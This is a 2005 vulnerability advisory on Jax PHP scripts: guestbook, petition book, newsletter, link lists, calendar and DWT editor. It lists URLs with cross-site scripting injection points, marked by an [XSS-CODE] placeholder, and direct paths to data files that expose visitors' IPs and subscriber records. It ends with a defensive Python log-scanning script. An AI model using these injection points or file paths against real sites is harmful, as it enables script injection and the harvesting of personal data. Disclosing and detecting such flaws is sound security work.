############################################
Jax PHP Scripts multiple vulnerabilities
vendor url: http://www.jtr.de/scripting/php/
Advisory: http://lostmon.blogspot.com/2005/08/jax-php-scripts-multiple.html
vendor notify: yes
exploit available: yes
############################################

###########
summary:
###########

0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline

###############
0- Description
###############

Jax Scripts is a collection of useful PHP scripts to add to or include in a web site.

Jax Guestbook (GPL)*     ==> PHP script for running a WWW guestbook
Jax Petitionbook (GPL)*  ==> adaptation of Jax Guestbook for running a WWW petition book
Jax Newsletter (GPL)*    ==> PHP script for running online mailing lists / newsletters (Mailing List Manager)
Jax LinkLists (GPL)*     ==> PHP script for running simple hyperlink lists (Hyperlink Manager)
Jax Calendar (GPL)*      ==> PHP script for running a simple web calendar (calendar manager)
Jax DWT Editor (GPL)*    ==> PHP script for editing HTML files based on Dreamweaver templates (Template Editor)

###################
1- Products affected
###################

Jax Guestbook    ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter   ==> Cross-Site Scripting and information disclosure.
Jax LinkLists    ==> Cross-Site Scripting and information disclosure.
Jax Calendar     ==> Cross-Site Scripting.
Jax DWT Editor   ==> Cross-Site Scripting.

##################
2- Jax Guestbook
##################

Cross-Site Scripting and information disclosure:

http://[victim]/guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/jax_guestbook.php?page=2&language=english[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?page=2[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?mailto=9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]

http://[victim]/guestbook/guestbook                 // IP addresses of the clients who have signed the guestbook
http://[victim]/guestbook/guestbook_ips2block       // list of banned IPs
http://[victim]/guestbook/ips2block                 // list of banned IPs
http://[victim]/guestbook/formmailer/logfile.csv    // IPs and messages sent by users via the formmail.php script

###############
versions
###############

Jax Guestbook v3.1
Jax Guestbook v3.31

###################
3- Jax Petitionbook
###################

Cross-Site Scripting and information disclosure:

http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/shrimp_petition.php?page=3[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0

http://[victim]/petitionbook/formmailer.log    // all IPs and messages that users sent via formmail
http://[victim]/petitionbook/ips2block         // all banned IPs
http://[victim]/petitionbook/petitionbook      // IPs of all the people who have signed the petition

#################
4- Jax Newsletter
#################

Cross-Site Scripting and information disclosure:

http://[victim]/newsletter/jax_newsletter.php?language=German[XSS-CODE]&ml_id=1
http://[victim]/newsletter/sign_in.php?do=sign_in&language=german[XSS-CODE]&ml_id=1&ml_id=1
http://[victim]/newsletter/archive.php?language=spanish[XSS-CODE]

http://[victim]/newsletter/logs/jnl_records    // information disclosure of user data: a direct request to this
                                               // file reveals "email","hash","mail_format","gender","nick","mode",
                                               // "groups","action","time","ip","age","profession","nationality"
                                               // for the registered users.

############
versions
############

Jax Newsletter v2.14
Jax Newsletter v2.10

#################
5- Jax LinkLists
#################

Cross-Site Scripting and information disclosure:

http://[victim]/linklists/jax_linklists.php?language=English[XSS-CODE]
http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]

http://[victim]/linklists/suggestions.csv    // a direct request discloses the IP of the client who suggested a link.

#############
versions
#############

Jax LinkLists v1.1
Jax LinkLists v1.0

#################
6- Jax Calendar
#################

Cross-Site Scripting:

http://[victim]/calendar/jax_calendar.php?Y=2005[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld[XSS-CODE]

http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]
// all variables affected by XSS flaws

http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]
// all variables affected by XSS flaws

http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30
// all variables affected by XSS flaws

##############
versions
##############

Jax Calendar 1.34
Jax Calendar 1.33

#################
7- Jax DWT Editor
#################

Cross-Site Scripting:

http://[victim]/dwt_editor/dwt_editor.php?language=english[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?language=english&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=german&area=textbereich2[XSS-CODE]

##############
versions
##############

Jax DWT Editor v1.0

###################
8- Timeline
###################

discovered:      27-07-2005
vendor notify:   04-08-2005
vendor response: 04-08-2005
disclosure:      05-08-2005

####################
End
#############################

Thanks to estrella for being my light.

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
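Added note for defenders (not part of the original advisory): a small Python triage script that runs over web-server access-log lines and flags two things the advisory describes, namely successful direct reads of the data files the scripts keep under the web root, and requests whose reflected query parameters carry HTML markup. The file paths, parameter names and the `%3Cbr%3E` caveat are taken from the advisory's own URLs; the log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Data files the advisory reports as readable by direct request (paths as
# given in the advisory; the install directory may differ per site).
EXPOSED_FILES = (
    "/guestbook/guestbook", "/guestbook/guestbook_ips2block", "/guestbook/ips2block",
    "/guestbook/formmailer/logfile.csv", "/petitionbook/formmailer.log",
    "/petitionbook/ips2block", "/petitionbook/petitionbook",
    "/newsletter/logs/jnl_records", "/linklists/suggestions.csv",
)
# Query parameters the advisory shows being reflected into the page unescaped.
REFLECTED_PARAMS = {"page", "language", "guestbook_id", "gmt_ofs", "mailto", "ml_id",
                    "cat", "Y", "m", "d", "cal_id", "view", "evt_date", "evt_title",
                    "cur_dir", "area"}
# jax_calendar's own evt_date values legitimately contain %3Cbr%3E (<br>), so a
# bare <br> is ignored; any other tag or event handler in a reflected value is flagged.
BR_TAG = re.compile(r"<br\s*/?>", re.IGNORECASE)
MARKUP = re.compile(r"<|>|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Common Log Format: client ip ... "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (kind, client_ip, detail) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path)
    # Successful direct read of a data file the scripts keep under the web root
    if status == "200" and any(path.endswith(f) for f in EXPOSED_FILES):
        return ("data-file-read", ip, path)
    # parse_qs percent-decodes values, so %3C becomes < before matching
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in REFLECTED_PARAMS:
            for v in values:
                if MARKUP.search(BR_TAG.sub("", v)):
                    return ("reflected-markup", ip, name)
    return None

def scan(lines):
    """Classify every log line and return the non-empty findings in order."""
    return [f for f in (classify(l) for l in lines) if f]

# Constructed sample log lines (not taken from any real server)
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Aug/2005:10:00:00 +0200] "GET /newsletter/logs/jnl_records HTTP/1.0" 200 4096',
    '198.51.100.7 - - [05/Aug/2005:10:01:00 +0200] "GET /guestbook/jax_guestbook.php?page=2&language=english%3CXSS-CODE%3E&guestbook_id=0&gmt_ofs=0 HTTP/1.0" 200 1234',
    '192.0.2.9 - - [05/Aug/2005:10:02:00 +0200] "GET /calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&cal_id=0&language=spanish&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00 HTTP/1.0" 200 2048',
    '192.0.2.9 - - [05/Aug/2005:10:03:00 +0200] "GET /guestbook/ips2block HTTP/1.0" 404 210',
]
```

Only the first two sample lines produce findings: the legitimate calendar request with `<br>` in evt_date and the 404 on ips2block are passed over.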